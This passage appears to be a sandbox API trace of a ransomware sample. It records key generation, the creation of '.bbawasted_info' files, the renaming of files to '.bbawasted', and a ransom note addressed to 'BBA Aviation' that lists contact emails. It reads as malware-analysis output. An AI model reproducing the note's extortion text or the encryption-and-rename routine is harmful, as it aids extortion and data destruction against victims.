szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x66c898) returned 1 [0160.249] CryptGenRandom (in: hProv=0x66c898, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0160.249] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0160.249] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x66c898) returned 1 [0160.250] CryptGenRandom (in: hProv=0x66c898, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0160.250] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0160.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0160.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0160.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.259] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]aCxvUmL2ir4ss8MQgUntfJTQxHpoMCE+yDR6O0KCBuOOlu2pOtY0FAAebbTsKoqy\r\nY5BGKxEGo/ojtsvDP8dWDkjcGj8qaf67/IDxvB1IpPOejnd05oc3txUfEFCM8OyU\r\nCK9PUK1fZK5m//dUEdY4nxBNjUK4ZXj5xIcbdPdP85XWNbazh5VDGhWcx5ExS0gc\r\nSacc4/L1Co4xSAHQm7pIg1+EZ20qm+RJP+7YtRsm+HH10GlIcxd/z0EsTb2pbSPT\r\nKnxf22GGh2EUbhrshf4Zf/Atw7PT55+vCpHJ8bAVxAUxnHaRDgVXGtZf+0jeFVAW\r\nBjp2X9uc0kclBlcNIRKPPHWeBDGC7ZcW1pi0eqY3u1G3HzkdR5sc09rTHke7YPTe\r\nccppCcyqQbVKGQQFXPkjpZMds1+AM4BniDYVS9C9xKCc3M8oN4gcySNJuwoCp7V+\r\niazpr1o2S2u0/kGDXf4YoZXCF7WfaOUo9ynSL5YGknNcJeoW+067ZPF65WlxufKP\r\nlP5Z0RmtBywAh88LXLqHAR33TYo6RFGKyFQ+p5CNI8Xq09XoZhGhSeijzZEkm3eX\r\n07L7DunNY8AnQUbn/EbJd0xK6SDjlaCChULF3CCkHjsJfHg9CFvHehBRsw5TwudW\r\nzQY5+ABemaGjIPbEOapevlOxlhEXex7w5u3mQx49RZ0=[end_key]\r\nKEEP IT\r\n") returned 984 [0160.259] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0160.259] WriteFile (in: hFile=0x28c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0160.259] SetEndOfFile (hFile=0x28c) returned 1 [0160.262] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.262] CloseHandle (hObject=0x28c) returned 1 [0160.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0160.263] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0ca0 | out: hHeap=0x660000) returned 1 [0160.264] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0160.264] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0160.264] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0160.264] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 48 [0160.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6aecf0 [0160.264] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0160.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.264] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef68) returned 1 [0160.265] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0160.265] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0160.265] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0160.279] WriteFile (in: hFile=0x288, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.280] SetEndOfFile (hFile=0x288) returned 1 [0160.280] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.280] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.bbawasted")) returned 1 [0160.281] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0160.281] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0160.281] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x14412 [0160.281] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14412) returned 0x640000 [0160.281] CloseHandle (hObject=0x294) returned 1 [0160.309] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0160.310] CloseHandle (hObject=0x27c) returned 1 [0160.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0160.310] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef68) returned 1 [0160.311] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0160.311] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0160.311] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef68) returned 1 [0160.311] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0160.311] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0160.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6a0928 [0160.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0160.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.446] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ZFIzpNdONctfHw5eXnbxRY7LoBt9R/gctw44PUgukAjJJ/SqV3mha9yVz70PmkYh\r\nKUVb89GXwDSWGLj3zRK9lG7Tc4ZTcx6YPRDJEhjqUqwI8jPS1F4b+QdTu6hsdhOJ\r\nfVgl9ldkYUcGgwV3SrDizaIRx+CJALEa8LS1K8HuiNX2i+dIfFw7yjKJcN8BIoMx\r\nHGDi1LwhWYllECOhop+T+AqjRbz9ZNset7DW+S8zezxwlMihUVhkWw9Yl3lXVPLw\r\nFJVU7sFUcLViJBvah2x2Bc62ep+90I3EuZ/Uw3Ohy5bRevO0fCF8G7oeAGIObufY\r\n3A1HO7XdIOonpody5FTs5be1CWMH0lpZufPY2kF03u7l2mbPG3ET8IzK4FNjHdH1\r\nSNJUQUmbYuXEI8NwJp3vDrCwUKE9ptj3LkEBa75r/3uCDeKNdXfy7VU5oIB1YmJk\r\nCiPOqjK5AVrB9K/0QqCS+c91oL0gXsJNoDTop3WvWUMWbXxtDXnY3ioxEiqZDmuB\r\nVKGTUxaPnsO9q9OYVnuYQ1BhYSQ8YszjvZtTJDYT4ePhvJ3cMe/3ZAut4UOdluiq\r\nzcSuZqmJj7cnLdVz+4zFLUSVFWCWOorAl3qW0yinkDjkeNcd4si6Z14fmEa/ahEM\r\nC9fKwcAt8puQjSYcz8rB+FATA0f1wd2tRjCifJfuWKv=[end_key]\r\nKEEP IT\r\n") returned 984 [0160.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0160.446] WriteFile (in: hFile=0x288, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0160.447] SetEndOfFile (hFile=0x288) returned 1 [0160.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.449] CloseHandle (hObject=0x288) returned 1 [0160.452] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0160.452] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0e08 | out: hHeap=0x660000) returned 1 [0160.452] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0160.453] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0160.453] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0160.453] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 39 [0160.453] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0160.453] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0160.453] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.453] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0160.454] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0160.454] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.454] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0160.502] WriteFile (in: hFile=0x28c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.503] SetEndOfFile (hFile=0x28c) returned 1 [0160.513] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.513] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.513] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.bbawasted")) returned 1 [0160.517] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0160.518] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0160.518] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1ac3 [0160.518] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ac3) returned 0x630000 [0160.518] CloseHandle (hObject=0x280) returned 1 [0160.529] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0160.529] CloseHandle (hObject=0x27c) returned 1 [0160.529] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0160.530] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x66c898) returned 1 [0160.530] CryptGenRandom (in: hProv=0x66c898, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0160.530] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0160.530] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x66c898) returned 1 [0160.531] CryptGenRandom (in: hProv=0x66c898, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0160.531] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0160.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0160.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0160.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.541] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]hvuBGHifsXiaKbJogcapSRctAxTu0cXRjzKd2ag7CSJEGR6iE0qrAbtpEf0xZm0x\r\n43LzIOz5nwSlRclAc9QhtnNeVeb8NdqawkIKpQUm3aZjtsaXOoHLN9v6CrUZy8PT\r\nGPbaehcD3CwO5loMg0Fxlv3e/IlvIGNOmqPEwzKghPaaqnI37YPULgqljUHKcMbo\r\nXoTNfeLe2U2NYpP5T5RcXO3/9crLdcwM3ITsOBxPIU+IUzZb5st4eLj39XwmNcW+\r\nQ01EpBeq6JVYaH4Howa93PD/iqToPeozF14lFJLaRkx7+zMrZMXGFDKumFyoV0r9\r\nffWHip50ckJUvL0rZzphfaTH2ODXl79qE0NPb8qISVAyPmaxPgQjePljcFWlYrNC\r\n98kmHnaQVsSV/sDD93a0V98hLk8RMfSQmJaHmYWttAoZ421BmWTebAYytCJ3syG4\r\nHS4S/D0lT/UJcS9TNAehpNMKl5y4E6yygRHhycW90wS/+yYsQHKK5Tj49xHZGVmq\r\nbMCniaHXc3/CK54BowBx8p+oMcQkOKRo5O6kticDAfZET5t50AteDAcKgsFZLm+J\r\nZLocukbvWaRRvoji9kObIwtBdrzJQeuPLiawIL1VBuznv6x1F0vnHmjyu0QLDCsv\r\nhs61lfPG+XE2OAtlkMRKJ+bYj/ze+WxCBsBAI65Ty1R=[end_key]\r\nKEEP IT\r\n") returned 984 [0160.541] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0160.542] WriteFile (in: hFile=0x28c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0160.542] SetEndOfFile (hFile=0x28c) returned 1 [0160.544] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.544] CloseHandle (hObject=0x28c) returned 1 [0160.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0160.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0ec8 | out: hHeap=0x660000) returned 1 [0160.546] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0160.547] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0160.547] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0160.547] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 39 [0160.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0160.547] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0160.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.547] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x66c898) returned 1 [0160.548] CryptGenRandom (in: hProv=0x66c898, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0160.548] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0160.548] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0160.802] WriteFile (in: hFile=0x27c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.804] SetEndOfFile (hFile=0x27c) returned 1 [0160.804] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.805] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.bbawasted")) returned 1 [0160.806] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0160.806] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0160.806] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x109e [0160.807] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x109e) returned 0x650000 [0160.807] CloseHandle (hObject=0x280) returned 1 [0160.848] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0160.848] CloseHandle (hObject=0x294) returned 1 [0160.848] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0160.848] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0160.849] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0160.849] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.849] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0160.849] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0160.849] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0160.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0160.860] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.860] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]owI8oIhsdn/ET6BQuDz/vUqCBBAy9Y6974P6KmBoU1R3j7YNl3Zp6OnTCRhd339E\r\naIM8lyoqezQ/AUkL6W4PjQF2G2Nl434Apuh1uVmSpoaMrON9jXpkM4S+42hZSktN\r\nSB1YB2tBZcwrtBAv69eEqL0ySmWwronK5tTuRNuTqm+dcCn1szxsExzoyNSKGx0S\r\nBoW0Ge+Y4h/OKLNz4uko/soArrraN8Lj8icXYfmdAx1pz4uJa3yeN2AYrBbeCIXW\r\njzZKozISrpmNNC4/Vh8JVjJJf1doT5VDBjqtvQnAiVpbZelcWdFuBinOXahAZTFe\r\niJVeSvGm81EJ+8CdeZjg8lgvheggNdvGZqDK717gh2BuvQ6p/bbENd2HRFpDACca\r\nZRK+siKjkIDXfsvTKI5ZPLfnUYN+XTGoofuy11OXvbEDICC+AaFzofwjhxSuHNRx\r\nCG12gtek0N4fLUkPEGgLo09Pf2AnaZl/CHKI2vo9lUeLQbpovdAluNqIcKle7w/g\r\nyX6xQDC7cxYNiy6ZRbLvpKwrO61841HCzz7QZrEFAh7UVN2BCKDqGmKBCTMl09xP\r\ngjOa3gizILO5TeerIO16+GKZEfgm5F+CrC9Hg9Ct4nclubqmUHA/p5bIZyfOCugz\r\nzWbqUNApSCgM7G5oH796LCQzJMleGfBRwY5AY+NLMpJ=[end_key]\r\nKEEP IT\r\n") returned 984 [0160.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0160.860] WriteFile (in: hFile=0x27c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, 